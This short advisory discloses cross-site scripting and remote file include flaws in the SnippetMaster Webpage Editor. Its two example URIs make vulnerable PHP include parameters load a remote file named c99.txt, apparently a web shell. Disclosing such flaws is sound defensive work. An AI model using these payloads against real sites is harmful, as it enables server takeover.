SnippetMaster Webpage Editor Cross Site Scripting and Remote File Include Vulnerabilities

SnippetMaster Webpage Editor Cross Site Scripting and Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser. To exploit the cross-site scripting issue, the attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www2.example.com/c99.txt?

http://www.example.com/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www2.example.com/c99.txt?